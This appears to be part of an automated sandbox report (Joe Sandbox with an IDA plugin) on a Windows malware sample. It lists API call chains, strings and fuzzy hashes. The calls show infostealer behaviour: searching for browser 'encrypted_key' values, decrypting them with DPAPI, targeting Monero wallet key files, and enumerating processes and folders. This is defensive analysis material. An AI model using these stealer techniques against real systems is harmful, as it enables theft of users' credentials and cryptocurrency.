                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000A1580,000A0D92), ref: 0008F54C
                                • lstrlen.KERNEL32(00000000), ref: 0008F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: e6be56e24154a9dc7a4dd05c49663974d62670ee41f964f1cc4b9e5c165c9959
                                • Instruction ID: f9e54f50083f9293a16a88ea813a76598e8568c27f091899f383787a14d22eb1
                                • Opcode Fuzzy Hash: e6be56e24154a9dc7a4dd05c49663974d62670ee41f964f1cc4b9e5c165c9959
                                • Instruction Fuzzy Hash: A151CE71E10108AADF04FBB4DC96DEE7379AF55300F408529F916A6192EE346A09DBE2
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0009718C
                                • s, xrefs: 000972AE, 00097179, 0009717C
                                • s, xrefs: 00097111
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 3722407311-1849715570
                                • Opcode ID: 2fee3748df01bd3633ed3be38db308778224d113e3534b6e73be93ce33250ba9
                                • Instruction ID: 089cc6fa539580fec51f09c1ff62cb9c976734b34e9efca58e6868c9201ab85c
                                • Opcode Fuzzy Hash: 2fee3748df01bd3633ed3be38db308778224d113e3534b6e73be93ce33250ba9
                                • Instruction Fuzzy Hash: 5E5193B1D142189BDF64EB94DC45BEEB3B4AF04304F1040A8E21977182EF742E88DF55
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 224a45fe203f61a89acdc2fb507fbd950cbfb898170a753f43d21a1268ed850d
                                • Instruction ID: f1d2e13566463a6b4d533d864ee034b2f8e9d0363bec7ad9734b5ec384b6cc84
                                • Opcode Fuzzy Hash: 224a45fe203f61a89acdc2fb507fbd950cbfb898170a753f43d21a1268ed850d
                                • Instruction Fuzzy Hash: 0D411D71E10109AFCF04EFE4D846AFEB7B4AF55304F008518E51677291EB75AA09DFA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00089D39
                                  • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                  • Part of subcall function 00089AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                  • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                  • Part of subcall function 00089AC0: LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                  • Part of subcall function 00089B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84
                                  • Part of subcall function 00089B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3
                                  • Part of subcall function 00089B60: LocalFree.KERNEL32(?), ref: 00089BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 9982e015f7c505929f2e3f789e1e2d26e5c7c30540bf2352f805cbd57f16415b
                                • Instruction ID: 7eb95e0a02949c507646bf1a47946a38d697e2c5673a7b87b10a90abb23d0042
                                • Opcode Fuzzy Hash: 9982e015f7c505929f2e3f789e1e2d26e5c7c30540bf2352f805cbd57f16415b
                                • Instruction Fuzzy Hash: 3A3110B5D10209ABCF04FBE4DD85AFEB7B9BF48304F184519E945A7242E7309A14CBA5
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000A05B7), ref: 000986CA
                                • Process32First.KERNEL32(?,00000128), ref: 000986DE
                                • Process32Next.KERNEL32(?,00000128), ref: 000986F3
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • CloseHandle.KERNEL32(?), ref: 00098761
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: bc06f9be847d55c790ce4df1b634888fa0f3346d814bf9dbb93693304aabfccd
                                • Instruction ID: 28a770abcd17d0799646d805156b67f20958869bb8dab24ed61be8cbd8d3e747
                                • Opcode Fuzzy Hash: bc06f9be847d55c790ce4df1b634888fa0f3346d814bf9dbb93693304aabfccd
                                • Instruction Fuzzy Hash: B7314D71A11218ABCF24DF95DC45FEEB778FB46700F104199F10AA61A1DF306A45DFA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000A0E00,00000000,?), ref: 000979B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 000979B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,000A0E00,00000000,?), ref: 000979C4
                                • wsprintfA.USER32 ref: 000979F3
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 3db8a3349c6aa84a1d59d11132d9ca7b9edc0e2c82c62a49132cf3dd0ad54647
                                • Instruction ID: 8e2cbf19dd493d2b1d3ba30ac518c0e96a9be8877080c3187ba6e4876b897745
                                • Opcode Fuzzy Hash: 3db8a3349c6aa84a1d59d11132d9ca7b9edc0e2c82c62a49132cf3dd0ad54647
                                • Instruction Fuzzy Hash: 5C1115B2904118ABCB149FC9ED49FBEB7F8EB48B15F10421AF605A2280E2395940DBB1
                                APIs
                                • __getptd.LIBCMT ref: 0009C74E
                                  • Part of subcall function 0009BF9F: __amsg_exit.LIBCMT ref: 0009BFAF
                                • __getptd.LIBCMT ref: 0009C765
                                • __amsg_exit.LIBCMT ref: 0009C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0009C797
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: eb81484084110f7b2f6be819198dc62ad258f09fa79ae0786887f068fd011611
                                • Instruction ID: 20987f5c33e9b1e45bdf8ca57ce5139b357ad4d64892f984acd7f8c05e315e59
                                • Opcode Fuzzy Hash: eb81484084110f7b2f6be819198dc62ad258f09fa79ae0786887f068fd011611
                                • Instruction Fuzzy Hash: 35F09032E08A009BFF60BBF86946B9D73E06F01720F204159F404A61D3DB645940BE96
                                APIs
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00094F7A
                                • lstrcat.KERNEL32(?,000A1070), ref: 00094F97
                                • lstrcat.KERNEL32(?,00D08920), ref: 00094FAB
                                • lstrcat.KERNEL32(?,000A1074), ref: 00094FBD
                                  • Part of subcall function 00094910: wsprintfA.USER32 ref: 0009492C
                                  • Part of subcall function 00094910: FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                  • Part of subcall function 00094910: FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                  • Part of subcall function 00094910: FindClose.KERNEL32(000000FF), ref: 00094B92
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: f2f787d6057ca9b9c4330dd4638f931d757373cccbfa7bbdc7147fb29a515c43
                                • Instruction ID: fd3f79142ff3f8f7f962b8dce798fb5b6a4abaf9f7d6354cbb23d188d7af0a41
                                • Opcode Fuzzy Hash: f2f787d6057ca9b9c4330dd4638f931d757373cccbfa7bbdc7147fb29a515c43
                                • Instruction Fuzzy Hash: F821AD7690020CA7CB54F7B0FC4AEED333CAB55304F404558B65997182EE7596C9CB93